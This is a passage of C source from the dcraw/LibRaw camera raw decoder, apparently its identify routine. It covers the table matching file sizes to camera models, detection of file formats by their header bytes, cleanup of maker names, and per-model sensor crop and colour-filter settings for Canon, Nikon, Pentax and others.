{ 15534576,3728,2778,12, 9,44, 9,40,0x94,0,2,"Canon","PowerShot SX120 IS" },
{ 18653760,4080,3048,24,12,24,12,40,0x94,0,2,"Canon","PowerShot SX20 IS" },
{ 19131120,4168,3060,92,16, 4, 1,40,0x94,0,2,"Canon","PowerShot SX220 HS" },
{ 21936096,4464,3276,25,10,73,12,40,0x16,0,2,"Canon","PowerShot SX30 IS" },
{ 24724224,4704,3504, 8,16,56, 8,40,0x49,0,2,"Canon","PowerShot A3300 IS" },
{ 30858240,5248,3920, 8,16,56,16,40,0x94,0,2,"Canon","IXUS 160" },
{ 1976352,1632,1211, 0, 2, 0, 1, 0,0x94,0,1,"Casio","QV-2000UX" },
{ 3217760,2080,1547, 0, 0,10, 1, 0,0x94,0,1,"Casio","QV-3*00EX" },
{ 6218368,2585,1924, 0, 0, 9, 0, 0,0x94,0,1,"Casio","QV-5700" },
{ 7816704,2867,2181, 0, 0,34,36, 0,0x16,0,1,"Casio","EX-Z60" },
{ 2937856,1621,1208, 0, 0, 1, 0, 0,0x94,7,13,"Casio","EX-S20" },
{ 4948608,2090,1578, 0, 0,32,34, 0,0x94,7,1,"Casio","EX-S100" },
{ 6054400,2346,1720, 2, 0,32, 0, 0,0x94,7,1,"Casio","QV-R41" },
{ 7426656,2568,1928, 0, 0, 0, 0, 0,0x94,0,1,"Casio","EX-P505" },
{ 7530816,2602,1929, 0, 0,22, 0, 0,0x94,7,1,"Casio","QV-R51" },
{ 7542528,2602,1932, 0, 0,32, 0, 0,0x94,7,1,"Casio","EX-Z50" },
{ 7562048,2602,1937, 0, 0,25, 0, 0,0x16,7,1,"Casio","EX-Z500" },
{ 7753344,2602,1986, 0, 0,32,26, 0,0x94,7,1,"Casio","EX-Z55" },
{ 9313536,2858,2172, 0, 0,14,30, 0,0x94,7,1,"Casio","EX-P600" },
{ 10834368,3114,2319, 0, 0,27, 0, 0,0x94,0,1,"Casio","EX-Z750" },
{ 10843712,3114,2321, 0, 0,25, 0, 0,0x94,0,1,"Casio","EX-Z75" },
{ 10979200,3114,2350, 0, 0,32,32, 0,0x94,7,1,"Casio","EX-P700" },
{ 12310144,3285,2498, 0, 0, 6,30, 0,0x94,0,1,"Casio","EX-Z850" },
{ 12489984,3328,2502, 0, 0,47,35, 0,0x94,0,1,"Casio","EX-Z8" },
{ 15499264,3754,2752, 0, 0,82, 0, 0,0x94,0,1,"Casio","EX-Z1050" },
{ 18702336,4096,3044, 0, 0,24, 0,80,0x94,7,1,"Casio","EX-ZR100" },
{ 7684000,2260,1700, 0, 0, 0, 0,13,0x94,0,1,"Casio","QV-4000" },
{ 787456,1024, 769, 0, 1, 0, 0, 0,0x49,0,0,"Creative","PC-CAM 600" },
{ 28829184,4384,3288, 0, 0, 0, 0,36,0x61,0,0,"DJI" },
{ 15151104,4608,3288, 0, 0, 0, 0, 0,0x94,0,0,"Matrix" },
{ 3840000,1600,1200, 0, 0, 0, 0,65,0x49,0,0,"Foculus","531C" },
{ 307200, 640, 480, 0, 0, 0, 0, 0,0x94,0,0,"Generic" },
{ 62464, 256, 244, 1, 1, 6, 1, 0,0x8d,0,0,"Kodak","DC20" },
{ 124928, 512, 244, 1, 1,10, 1, 0,0x8d,0,0,"Kodak","DC20" },
{ 1652736,1536,1076, 0,52, 0, 0, 0,0x61,0,0,"Kodak","DCS200" },
{ 4159302,2338,1779, 1,33, 1, 2, 0,0x94,0,0,"Kodak","C330" },
{ 4162462,2338,1779, 1,33, 1, 2, 0,0x94,0,0,"Kodak","C330",3160 },
{ 2247168,1232, 912, 0, 0,16, 0, 0,0x00,0,0,"Kodak","C330" },
{ 3370752,1232, 912, 0, 0,16, 0, 0,0x00,0,0,"Kodak","C330" },
{ 6163328,2864,2152, 0, 0, 0, 0, 0,0x94,0,0,"Kodak","C603" },
{ 6166488,2864,2152, 0, 0, 0, 0, 0,0x94,0,0,"Kodak","C603",3160 },
{ 460800, 640, 480, 0, 0, 0, 0, 0,0x00,0,0,"Kodak","C603" },
{ 9116448,2848,2134, 0, 0, 0, 0, 0,0x00,0,0,"Kodak","C603" },
{ 12241200,4040,3030, 2, 0, 0,13, 0,0x49,0,0,"Kodak","12MP" },
{ 12272756,4040,3030, 2, 0, 0,13, 0,0x49,0,0,"Kodak","12MP",31556 },
{ 18000000,4000,3000, 0, 0, 0, 0, 0,0x00,0,0,"Kodak","12MP" },
{ 614400, 640, 480, 0, 3, 0, 0,64,0x94,0,0,"Kodak","KAI-0340" },
{ 15360000,3200,2400, 0, 0, 0, 0,96,0x16,0,0,"Lenovo","A820" },
{ 3884928,1608,1207, 0, 0, 0, 0,96,0x16,0,0,"Micron","2010",3212 },
{ 1138688,1534, 986, 0, 0, 0, 0, 0,0x61,0,0,"Minolta","RD175",513 },
{ 1581060,1305, 969, 0, 0,18, 6, 6,0x1e,4,1,"Nikon","E900" },
{ 2465792,1638,1204, 0, 0,22, 1, 6,0x4b,5,1,"Nikon","E950" },
{ 2940928,1616,1213, 0, 0, 0, 7,30,0x94,0,1,"Nikon","E2100" },
{ 4771840,2064,1541, 0, 0, 0, 1, 6,0xe1,0,1,"Nikon","E990" },
{ 4775936,2064,1542, 0, 0, 0, 0,30,0x94,0,1,"Nikon","E3700" },
{ 5865472,2288,1709, 0, 0, 0, 1, 6,0xb4,0,1,"Nikon","E4500" },
{ 5869568,2288,1710, 0, 0, 0, 0, 6,0x16,0,1,"Nikon","E4300" },
{ 7438336,2576,1925, 0, 0, 0, 1, 6,0xb4,0,1,"Nikon","E5000" },
{ 8998912,2832,2118, 0, 0, 0, 0,30,0x94,7,1,"Nikon","COOLPIX S6" },
{ 5939200,2304,1718, 0, 0, 0, 0,30,0x16,0,0,"Olympus","C770UZ" },
{ 3178560,2064,1540, 0, 0, 0, 0, 0,0x94,0,1,"Pentax","Optio S" },
{ 4841984,2090,1544, 0, 0,22, 0, 0,0x94,7,1,"Pentax","Optio S" },
{ 6114240,2346,1737, 0, 0,22, 0, 0,0x94,7,1,"Pentax","Optio S4" },
{ 10702848,3072,2322, 0, 0, 0,21,30,0x94,0,1,"Pentax","Optio 750Z" },
{ 4147200,1920,1080, 0, 0, 0, 0, 0,0x49,0,0,"Photron","BC2-HD" },
{ 4151666,1920,1080, 0, 0, 0, 0, 0,0x49,0,0,"Photron","BC2-HD",8 },
{ 13248000,2208,3000, 0, 0, 0, 0,13,0x61,0,0,"Pixelink","A782" },
{ 6291456,2048,1536, 0, 0, 0, 0,96,0x61,0,0,"RoverShot","3320AF" },
{ 311696, 644, 484, 0, 0, 0, 0, 0,0x16,0,8,"ST Micro","STV680 VGA" },
{ 16098048,3288,2448, 0, 0,24, 0, 9,0x94,0,1,"Samsung","S85" },
{ 16215552,3312,2448, 0, 0,48, 0, 9,0x94,0,1,"Samsung","S85" },
{ 20487168,3648,2808, 0, 0, 0, 0,13,0x94,5,1,"Samsung","WB550" },
{ 24000000,4000,3000, 0, 0, 0, 0,13,0x94,5,1,"Samsung","WB550" },
{ 12582980,3072,2048, 0, 0, 0, 0,33,0x61,0,0,"Sinar","",68 },
{ 33292868,4080,4080, 0, 0, 0, 0,33,0x61,0,0,"Sinar","",68 },
{ 44390468,4080,5440, 0, 0, 0, 0,33,0x61,0,0,"Sinar","",68 },
{ 1409024,1376,1024, 0, 0, 1, 0, 0,0x49,0,0,"Sony","XCD-SX910CR" },
{ 2818048,1376,1024, 0, 0, 1, 0,97,0x49,0,0,"Sony","XCD-SX910CR" },
};
#ifdef LIBRAW_LIBRARY_BUILD
libraw_custom_camera_t
table[64 + sizeof(const_table)/sizeof(const_table[0])];
#endif
static const char *corp[] =
{ "AgfaPhoto", "Canon", "Casio", "Epson", "Fujifilm",
"Mamiya", "Minolta", "Motorola", "Kodak", "Konica", "Leica",
"Nikon", "Nokia", "Olympus", "Pentax", "Phase One", "Ricoh",
"Samsung", "Sigma", "Sinar", "Sony" };
#ifdef LIBRAW_LIBRARY_BUILD
char head[64], *cp;
#else
char head[32], *cp;
#endif
int hlen, flen, fsize, zero_fsize=1, i, c;
struct jhead jh;
#ifdef LIBRAW_LIBRARY_BUILD
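  /* In the LibRaw build, up to 64 user-defined custom cameras are parsed into
     the first slots of table[], and the built-in const_table entries are
     appended after them for the file-size match further below. */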
unsigned camera_count = parse_custom_cameras(64,table,imgdata.params.custom_camera_strings);
for(int q = 0; q < sizeof(const_table)/sizeof(const_table[0]); q++)
memmove(&table[q+camera_count],&const_table[q],sizeof(const_table[0]));
camera_count += sizeof(const_table)/sizeof(const_table[0]);
#endif
tiff_flip = flip = filters = UINT_MAX; /* unknown */
raw_height = raw_width = fuji_width = fuji_layout = cr2_slice[0] = 0;
maximum = height = width = top_margin = left_margin = 0;
cdesc[0] = desc[0] = artist[0] = make[0] = model[0] = model2[0] = 0;
iso_speed = shutter = aperture = focal_len = unique_id = 0;
tiff_nifds = 0;
memset (tiff_ifd, 0, sizeof tiff_ifd);
memset (gpsdata, 0, sizeof gpsdata);
memset (cblack, 0, sizeof cblack);
memset (white, 0, sizeof white);
memset (mask, 0, sizeof mask);
thumb_offset = thumb_length = thumb_width = thumb_height = 0;
load_raw = thumb_load_raw = 0;
write_thumb = &CLASS jpeg_thumb;
data_offset = meta_offset = meta_length = tiff_bps = tiff_compress = 0;
kodak_cbpp = zero_after_ff = dng_version = load_flags = 0;
timestamp = shot_order = tiff_samples = black = is_foveon = 0;
mix_green = profile_length = data_error = zero_is_bad = 0;
pixel_aspect = is_raw = raw_color = 1;
tile_width = tile_length = 0;
for (i=0; i < 4; i++) {
cam_mul[i] = i == 1;
pre_mul[i] = i < 3;
FORC3 cmatrix[c][i] = 0;
FORC3 rgb_cam[c][i] = c == i;
}
colors = 3;
for (i=0; i < 0x10000; i++) curve[i] = i;
order = get2();
hlen = get4();
fseek (ifp, 0, SEEK_SET);
#ifdef LIBRAW_LIBRARY_BUILD
fread (head, 1, 64, ifp);
libraw_internal_data.unpacker_data.lenRAFData = libraw_internal_data.unpacker_data.posRAFData = 0;
#else
fread (head, 1, 32, ifp);
#endif
fseek (ifp, 0, SEEK_END);
flen = fsize = ftell(ifp);
if ((cp = (char *) memmem (head, 32, (char*)"MMMM", 4)) ||
(cp = (char *) memmem (head, 32, (char*)"IIII", 4))) {
parse_phase_one (cp-head);
if (cp-head && parse_tiff(0)) apply_tiff();
} else if (order == 0x4949 || order == 0x4d4d) {
if (!memcmp (head+6,"HEAPCCDR",8)) {
data_offset = hlen;
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FixedLens;
#endif
parse_ciff (hlen, flen-hlen, 0);
load_raw = &CLASS canon_load_raw;
} else if (parse_tiff(0)) apply_tiff();
} else if (!memcmp (head,"\xff\xd8\xff\xe1",4) &&
!memcmp (head+6,"Exif",4)) {
fseek (ifp, 4, SEEK_SET);
data_offset = 4 + get2();
fseek (ifp, data_offset, SEEK_SET);
if (fgetc(ifp) != 0xff)
parse_tiff(12);
thumb_offset = 0;
} else if (!memcmp (head+25,"ARECOYK",7)) {
strcpy (make, "Contax");
strcpy (model,"N Digital");
fseek (ifp, 33, SEEK_SET);
get_timestamp(1);
fseek (ifp, 52, SEEK_SET);
switch (get4()) {
case 7: iso_speed = 25; break;
case 8: iso_speed = 32; break;
case 9: iso_speed = 40; break;
case 10: iso_speed = 50; break;
case 11: iso_speed = 64; break;
case 12: iso_speed = 80; break;
case 13: iso_speed = 100; break;
case 14: iso_speed = 125; break;
case 15: iso_speed = 160; break;
case 16: iso_speed = 200; break;
case 17: iso_speed = 250; break;
case 18: iso_speed = 320; break;
case 19: iso_speed = 400; break;
}
shutter = libraw_powf64(2.0f, (((float)get4())/8.0f)) / 16000.0f;
FORC4 cam_mul[c ^ (c >> 1)] = get4();
fseek (ifp, 88, SEEK_SET);
aperture = libraw_powf64(2.0f, ((float)get4())/16.0f);
fseek (ifp, 112, SEEK_SET);
focal_len = get4();
#ifdef LIBRAW_LIBRARY_BUILD
fseek (ifp, 104, SEEK_SET);
imgdata.lens.makernotes.MaxAp4CurFocal = libraw_powf64(2.0f, ((float)get4())/16.0f);
fseek (ifp, 124, SEEK_SET);
stmread(imgdata.lens.makernotes.Lens, 32, ifp);
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_Contax_N;
if (imgdata.lens.makernotes.Lens[0])
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_Contax_N;
#endif
} else if (!strcmp (head, "PXN")) {
strcpy (make, "Logitech");
strcpy (model,"Fotoman Pixtura");
} else if (!strcmp (head, "qktk")) {
strcpy (make, "Apple");
strcpy (model,"QuickTake 100");
load_raw = &CLASS quicktake_100_load_raw;
} else if (!strcmp (head, "qktn")) {
strcpy (make, "Apple");
strcpy (model,"QuickTake 150");
load_raw = &CLASS kodak_radc_load_raw;
} else if (!memcmp (head,"FUJIFILM",8)) {
#ifdef LIBRAW_LIBRARY_BUILD
strcpy(model, head+0x1c);
memcpy(model2, head+0x3c, 4);
model2[4]=0;
#endif
fseek (ifp, 84, SEEK_SET);
thumb_offset = get4();
thumb_length = get4();
fseek (ifp, 92, SEEK_SET);
parse_fuji (get4());
if (thumb_offset > 120) {
fseek (ifp, 120, SEEK_SET);
is_raw += (i = get4())?1:0;
if (is_raw == 2 && shot_select)
parse_fuji (i);
}
load_raw = &CLASS unpacked_load_raw;
fseek (ifp, 100+28*(shot_select > 0), SEEK_SET);
parse_tiff (data_offset = get4());
parse_tiff (thumb_offset+12);
apply_tiff();
} else if (!memcmp (head,"RIFF",4)) {
fseek (ifp, 0, SEEK_SET);
parse_riff();
} else if (!memcmp (head+4,"ftypqt ",9)) {
fseek (ifp, 0, SEEK_SET);
parse_qt (fsize);
is_raw = 0;
} else if (!memcmp (head,"\0\001\0\001\0@",6)) {
fseek (ifp, 6, SEEK_SET);
fread (make, 1, 8, ifp);
fread (model, 1, 8, ifp);
fread (model2, 1, 16, ifp);
data_offset = get2();
get2();
raw_width = get2();
raw_height = get2();
load_raw = &CLASS nokia_load_raw;
filters = 0x61616161;
} else if (!memcmp (head,"NOKIARAW",8)) {
strcpy (make, "NOKIA");
order = 0x4949;
fseek (ifp, 300, SEEK_SET);
data_offset = get4();
i = get4();
width = get2();
height = get2();
#ifdef LIBRAW_LIBRARY_BUILD
// data length should be in range w*h..w*h*2
if(width*height < (LIBRAW_MAX_ALLOC_MB*1024*512L) && width*height>1
&& i >= width * height && i <= width*height*2)
{
#endif
switch (tiff_bps = i*8 / (width * height)) {
case 8: load_raw = &CLASS eight_bit_load_raw; break;
case 10: load_raw = &CLASS nokia_load_raw;
}
raw_height = height + (top_margin = i / (width * tiff_bps/8) - height);
mask[0][3] = 1;
filters = 0x61616161;
#ifdef LIBRAW_LIBRARY_BUILD
}
else
is_raw = 0;
#endif
} else if (!memcmp (head,"ARRI",4)) {
order = 0x4949;
fseek (ifp, 20, SEEK_SET);
width = get4();
height = get4();
strcpy (make, "ARRI");
fseek (ifp, 668, SEEK_SET);
fread (model, 1, 64, ifp);
data_offset = 4096;
load_raw = &CLASS packed_load_raw;
load_flags = 88;
filters = 0x61616161;
} else if (!memcmp (head,"XPDS",4)) {
order = 0x4949;
fseek (ifp, 0x800, SEEK_SET);
fread (make, 1, 41, ifp);
raw_height = get2();
raw_width = get2();
fseek (ifp, 56, SEEK_CUR);
fread (model, 1, 30, ifp);
data_offset = 0x10000;
load_raw = &CLASS canon_rmf_load_raw;
gamma_curve (0, 12.25, 1, 1023);
} else if (!memcmp (head+4,"RED1",4)) {
strcpy (make, "Red");
strcpy (model,"One");
parse_redcine();
load_raw = &CLASS redcine_load_raw;
gamma_curve (1/2.4, 12.92, 1, 4095);
filters = 0x49494949;
} else if (!memcmp (head,"DSC-Image",9))
parse_rollei();
else if (!memcmp (head,"PWAD",4))
parse_sinar_ia();
else if (!memcmp (head,"\0MRM",4))
parse_minolta(0);
else if (!memcmp (head,"FOVb",4))
{
#ifdef LIBRAW_LIBRARY_BUILD
#ifdef LIBRAW_DEMOSAIC_PACK_GPL2
if(!(imgdata.params.raw_processing_options & LIBRAW_PROCESSING_FORCE_FOVEON_X3F))
parse_foveon();
else
#endif
parse_x3f();
#else
#ifdef LIBRAW_DEMOSAIC_PACK_GPL2
parse_foveon();
#endif
#endif
}
else if (!memcmp (head,"CI",2))
parse_cine();
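  /* If no maker could be read from the file header, fall back to matching the
     exact file size against the table of headerless raw formats above. */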
if(make[0] == 0)
#ifdef LIBRAW_LIBRARY_BUILD
for (zero_fsize=i=0; i < camera_count; i++)
#else
for (zero_fsize=i=0; i < sizeof table / sizeof *table; i++)
#endif
if (fsize == table[i].fsize) {
strcpy (make, table[i].t_make );
#ifdef LIBRAW_LIBRARY_BUILD
if (!strncmp(make, "Canon",5))
{
imgdata.lens.makernotes.CameraMount = LIBRAW_MOUNT_FixedLens;
imgdata.lens.makernotes.LensMount = LIBRAW_MOUNT_FixedLens;
}
#endif
strcpy (model, table[i].t_model);
flip = table[i].flags >> 2;
zero_is_bad = table[i].flags & 2;
if (table[i].flags & 1)
parse_external_jpeg();
data_offset = table[i].offset == 0xffff?0:table[i].offset;
raw_width = table[i].rw;
raw_height = table[i].rh;
left_margin = table[i].lm;
top_margin = table[i].tm;
width = raw_width - left_margin - table[i].rm;
height = raw_height - top_margin - table[i].bm;
filters = 0x1010101 * table[i].cf;
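      /* Derive the number of distinct CFA colors (3 or 4) from the packed
         filter pattern. */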
colors = 4 - !((filters & filters >> 1) & 0x5555);
load_flags = table[i].lf;
switch (tiff_bps = (fsize-data_offset)*8 / (raw_width*raw_height)) {
case 6:
load_raw = &CLASS minolta_rd175_load_raw; break;
case 8:
load_raw = &CLASS eight_bit_load_raw; break;
case 10:
if ((fsize-data_offset)/raw_height*3 >= raw_width*4) {
load_raw = &CLASS android_loose_load_raw; break;
} else if (load_flags & 1) {
load_raw = &CLASS android_tight_load_raw; break;
}
case 12:
load_flags |= 128;
load_raw = &CLASS packed_load_raw; break;
case 16:
order = 0x4949 | 0x404 * (load_flags & 1);
tiff_bps -= load_flags >> 4;
tiff_bps -= load_flags = load_flags >> 1 & 7;
load_raw = table[i].offset == 0xffff ? &CLASS unpacked_load_raw_reversed : &CLASS unpacked_load_raw;
}
maximum = (1 << tiff_bps) - (1 << table[i].max);
}
if (zero_fsize) fsize = 0;
if (make[0] == 0) parse_smal (0, flen);
if (make[0] == 0) {
parse_jpeg(0);
fseek(ifp,0,SEEK_END);
int sz = ftell(ifp);
#ifdef LIBRAW_LIBRARY_BUILD
if (!strncmp(model,"RP_imx219",9) && sz >= 0x9cb600 &&
!fseek (ifp, -0x9cb600, SEEK_END) &&
fread (head, 1, 0x20, ifp) && !strncmp(head, "BRCM", 4)) {
strcpy (make, "Broadcom");
strcpy (model, "RPi IMX219");
if (raw_height > raw_width) flip = 5;
data_offset = ftell(ifp) + 0x8000 - 0x20;
parse_broadcom();
black = 66;
maximum = 0x3ff;
load_raw = &CLASS broadcom_load_raw;
thumb_offset = 0;
thumb_length = sz - 0x9cb600 - 1;
} else
if (!(strncmp(model,"ov5647",6) && strncmp(model,"RP_OV5647",9)) && sz >= 0x61b800 &&
!fseek (ifp, -0x61b800, SEEK_END) &&
fread (head, 1, 0x20, ifp) && !strncmp(head, "BRCM", 4)) {
strcpy (make, "Broadcom");
if (!strncmp(model,"ov5647",6))
strcpy (model, "RPi OV5647 v.1");
else
strcpy (model, "RPi OV5647 v.2");
if (raw_height > raw_width) flip = 5;
data_offset = ftell(ifp) + 0x8000 - 0x20;
parse_broadcom();
black = 16;
maximum = 0x3ff;
load_raw = &CLASS broadcom_load_raw;
thumb_offset = 0;
thumb_length = sz - 0x61b800 - 1;
#else
if (!(strncmp(model,"ov",2) && strncmp(model,"RP_OV",5)) && sz>=6404096 &&
!fseek (ifp, -6404096, SEEK_END) &&
fread (head, 1, 32, ifp) && !strcmp(head,"BRCMn")) {
strcpy (make, "OmniVision");
data_offset = ftell(ifp) + 0x8000-32;
width = raw_width;
raw_width = 2611;
load_raw = &CLASS nokia_load_raw;
filters = 0x16161616;
#endif
} else is_raw = 0;
}
#ifdef LIBRAW_LIBRARY_BUILD
// make sure strings are terminated
desc[511] = artist[63] = make[63] = model[63] = model2[63] = 0;
#endif
for (i=0; i < sizeof corp / sizeof *corp; i++)
if (strcasestr (make, corp[i])) /* Simplify company names */
strcpy (make, corp[i]);
if ((!strncmp(make,"Kodak",5) || !strncmp(make,"Leica",5)) &&
((cp = strcasestr(model," DIGITAL CAMERA")) ||
(cp = strstr(model,"FILE VERSION"))))
*cp = 0;
if (!strncasecmp(model,"PENTAX",6))
strcpy (make, "Pentax");
#ifdef LIBRAW_LIBRARY_BUILD
remove_trailing_spaces(make,sizeof(make));
remove_trailing_spaces(model,sizeof(model));
#else
cp = make + strlen(make); /* Remove trailing spaces */
while (*--cp == ' ') *cp = 0;
cp = model + strlen(model);
while (*--cp == ' ') *cp = 0;
#endif
i = strbuflen(make); /* Remove make from model */
if (!strncasecmp (model, make, i) && model[i++] == ' ')
memmove (model, model+i, 64-i);
if (!strncmp (model,"FinePix ",8))
strcpy (model, model+8);
if (!strncmp (model,"Digital Camera ",15))
strcpy (model, model+15);
desc[511] = artist[63] = make[63] = model[63] = model2[63] = 0;
if (!is_raw) goto notraw;
if (!height) height = raw_height;
if (!width) width = raw_width;
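/* Hard-coded active-area crops for cameras whose raw files report the
   full masked sensor size (Pentax bodies and their Samsung twins,
   Ricoh GX200). */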
if (height == 2624 && width == 3936) /* Pentax K10D and Samsung GX10 */
{ height = 2616; width = 3896; }
if (height == 3136 && width == 4864) /* Pentax K20D and Samsung GX20 */
{ height = 3124; width = 4688; filters = 0x16161616; }
if (width == 4352 && (!strcmp(model,"K-r") || !strcmp(model,"K-x")))
{ width = 4309; filters = 0x16161616; }
if (width >= 4960 && !strncmp(model,"K-5",3))
{ left_margin = 10; width = 4950; filters = 0x16161616; }
if (width == 6080 && !strcmp(model,"K-70"))
{ height = 4016; top_margin=32; width=6020; left_margin = 60; }
if (width == 4736 && !strcmp(model,"K-7"))
{ height = 3122; width = 4684; filters = 0x16161616; top_margin = 2; }
if (width == 6080 && !strcmp(model,"K-3 II")) /* moved back */
{ left_margin = 4; width = 6040; }
if (width == 6080 && !strcmp(model,"K-3"))
{ left_margin = 4; width = 6040; }
if (width == 7424 && !strcmp(model,"645D"))
{ height = 5502; width = 7328; filters = 0x61616161; top_margin = 29;
left_margin = 48; }
if (height == 3014 && width == 4096) /* Ricoh GX200 */
width = 4014;
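/* DNG files: pick the load routine from the TIFF compression tag, map
   Canon/Sony unique IDs to model names, then jump past the per-camera
   tweaks below. */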
if (dng_version) {
if (filters == UINT_MAX) filters = 0;
if (filters) is_raw *= tiff_samples;
else colors = tiff_samples;
switch (tiff_compress) {
case 0: /* Compression not set, assuming uncompressed */
case 1: load_raw = &CLASS packed_dng_load_raw; break;
case 7: load_raw = &CLASS lossless_dng_load_raw; break;
#ifdef LIBRAW_LIBRARY_BUILD
case 8: load_raw = &CLASS deflate_dng_load_raw; break;
#endif
case 34892: load_raw = &CLASS lossy_dng_load_raw; break;
default: load_raw = 0;
}
if (!strncmp(make, "Canon",5) && unique_id)
{
for (i = 0; i < sizeof unique / sizeof *unique; i++)
if (unique_id == 0x80000000 + unique[i].id)
{
strcpy(model, unique[i].t_model);
break;
}
}
if (!strncasecmp(make, "Sony",4) && unique_id)
{
for (i = 0; i < sizeof sonique / sizeof *sonique; i++)
if (unique_id == sonique[i].id)
{
strcpy(model, sonique[i].t_model);
break;
}
}
goto dng_skip;
}
if (!strncmp(make,"Canon",5) && !fsize && tiff_bps != 15) {
if (!load_raw)
load_raw = &CLASS lossless_jpeg_load_raw;
for (i=0; i < sizeof canon / sizeof *canon; i++)
if (raw_width == canon[i][0] && raw_height == canon[i][1]) {
width = raw_width - (left_margin = canon[i][2]);
height = raw_height - (top_margin = canon[i][3]);
width -= canon[i][4];
height -= canon[i][5];
mask[0][1] = canon[i][6];
mask[0][3] = -canon[i][7];
mask[1][1] = canon[i][8];
mask[1][3] = -canon[i][9];
if (canon[i][10]) filters = canon[i][10] * 0x01010101;
}
if ((unique_id | 0x20000) == 0x2720000) {
left_margin = 8;
top_margin = 16;
}
}
if (!strncmp(make,"Canon",5) && unique_id)
{
for (i=0; i < sizeof unique / sizeof *unique; i++)
if (unique_id == 0x80000000 + unique[i].id)
{
adobe_coeff ("Canon", unique[i].t_model);
strcpy(model,unique[i].t_model);
}
}
if (!strncasecmp(make,"Sony",4) && unique_id)
{
for (i=0; i < sizeof sonique / sizeof *sonique; i++)
if (unique_id == sonique[i].id)
{
adobe_coeff ("Sony", sonique[i].t_model);
strcpy(model,sonique[i].t_model);
}
}
if (!strncmp(make,"Nikon",5)) {
if (!load_raw)
load_raw = &CLASS packed_load_raw;
if (model[0] == 'E')
load_flags |= !data_offset << 2 | 2;
}
/* Set parameters based on camera name (for non-DNG files). */
if (!strcmp(model,"KAI-0340")
&& find_green (16, 16, 3840, 5120) < 25) {
height = 480;
top_margin = filters = 0;
strcpy (model,"C603");
}
if (!strcmp(make, "Sony") && raw_width > 3888 && !black && !cblack[0])
black = 128 << (tiff_bps - 12);
if (is_foveon) {
if (height*2 < width) pixel_aspect = 0.5;
if (height > width) pixel_aspect = 2;
filters = 0;
#ifdef LIBRAW_DEMOSAIC_PACK_GPL2
if(!(imgdata.params.raw_processing_options & LIBRAW_PROCESSING_FORCE_FOVEON_X3F))
simple_coeff(0);
#endif
}
else if(!strncmp(make,"Pentax",6))
{
if(!strncmp(model,"K-1",3))
{
top_margin = 18;
height = raw_height - top_margin;
if(raw_width == 7392)
{
left_margin = 6;
width = 7376;
}
}
}
else if (!strncmp(make,"Canon",5) && tiff_bps == 15) {
switch (width) {
case 3344: width -= 66;
case 3872: width -= 6;
}
if (height > width) {
SWAP(height,width);
SWAP(raw_height,raw_width);
}
if (width == 7200 && height == 3888)
{
raw_width = width = 6480;
raw_height = height = 4320;
}
filters = 0;
tiff_samples = colors = 3;
load_raw = &CLASS canon_sraw_load_raw;
} else if (!strcmp(model,"PowerShot 600")) {
height = 613;
width = 854;
raw_width = 896;
colors = 4;
filters = 0xe1e4e1e4;
load_raw = &CLASS canon_600_load_raw;
} else if (!strcmp(model,"PowerShot A5") ||
!strcmp(model,"PowerShot A5 Zoom")) {
height = 773;
width = 960;
raw_width = 992;
pixel_aspect = 256/235.0;
filters = 0x1e4e1e4e;
goto canon_a5;
} else if (!strcmp(model,"PowerShot A50")) {
height = 968;
width = 1290;
raw_width = 1320;
filters = 0x1b4e4b1e;
goto canon_a5;
} else if (!strcmp(model,"PowerShot Pro70")) {
height = 1024;
width = 1552;
filters = 0x1e4b4e1b;
canon_a5:
colors = 4;
tiff_bps = 10;
load_raw = &CLASS packed_load_raw;
load_flags = 40;
} else if (!strcmp(model,"PowerShot Pro90 IS") ||
!strcmp(model,"PowerShot G1")) {
colors = 4;
filters = 0xb4b4b4b4;
} else if (!strcmp(model,"PowerShot A610")) {
if (canon_s2is()) strcpy (model+10, "S2 IS");
} else if (!strcmp(model,"PowerShot SX220 HS")) {
mask[1][3] = -4;
top_margin=16;
left_margin = 92;
} else if (!strcmp(model,"PowerShot S120")) {
raw_width = 4192;
raw_height = 3062;
width = 4022;
height = 3016;
mask[0][0] = top_margin = 31;
mask[0][2] = top_margin + height;
left_margin = 120;
mask[0][1] = 23;
mask[0][3] = 72;
} else if (!strcmp(model,"PowerShot G16")) {
mask[0][0] = 0;
mask[0][2] = 80;
mask[0][1] = 0;
mask[0][3] = 16;
top_margin = 29;
left_margin = 120;
width = raw_width-left_margin-48;
height = raw_height-top_margin-14;
} else if (!strcmp(model,"PowerShot SX50 HS")) {
top_margin = 17;
} else if (!strcmp(model,"EOS D2000C")) {
filters = 0x61616161;
black = curve[200];
} else if (!strcmp(model,"D1")) {
cam_mul[0] *= 256/527.0;
cam_mul[2] *= 256/317.0;
} else if (!strcmp(model,"D1X")) {
width -= 4;
pixel_aspect = 0.5;
} else if (!strcmp(model,"D40X") ||
!strcmp(model,"D60") ||
!strcmp(model,"D80") ||
!strcmp(model,"D3000")) {
height -= 3;
width -= 4;
} else if (!strcmp(model,"D3") ||
!strcmp(model,"D3S") ||
!strcmp(model,"D700")) {
width -= 4;
left_margin = 2;
} else if (!strcmp(model,"D3100")) {
width -= 28;
left_margin = 6;
} else if (!strcmp(model,"D5000") ||
!strcmp(model,"D90")) {
width -= 42;
} else if (!strcmp(model,"D5100") ||
!strcmp(model,"D7000") ||
!strcmp(model,"COOLPIX A")) {
width -= 44;
} else if (!strcmp(model,"D3200") ||
!strncmp(model,"D6",2) ||
!strncmp(model,"D800",4)) {
width -= 46;
} else if (!strcmp(model,"D4") ||
!strcmp(model,"Df")) {
width -= 52;
left_margin = 2;
} else if (!strncmp(model,"D40",3) ||
!strncmp(model,"D50",3) ||
!strncmp(model,"D70",3)) {
width--;
} else if (!strcmp(model,"D100")) {
if (load_flags)
raw_width = (width += 3) + 3;
} else if (!strcmp(model,"D200")) {
left_margin = 1;
width -= 4;
filters = 0x94949494;
} else if (!strncmp(model,"D2H",3)) {
left_margin = 6;
width -= 14;
} else if (!strncmp(model,"D2X",3)) {
if (width == 3264) width -= 32;
else width -= 8;
} else if (!strncmp(model,"D300",4)) {
width -= 32;
} else if (!strncmp(make,"Nikon",5) && raw_width == 4032) {
if(!strcmp(model,"COOLPIX P7700"))
{
adobe_coeff ("Nikon","COOLPIX P7700");
maximum = 65504;
load_flags = 0;
}
else if(!strcmp(model,"COOLPIX P7800"))
{
adobe_coeff ("Nikon","COOLPIX P7800");
maximum = 65504;
load_flags = 0;
}
else if(!strcmp(model,"COOLPIX P340"))
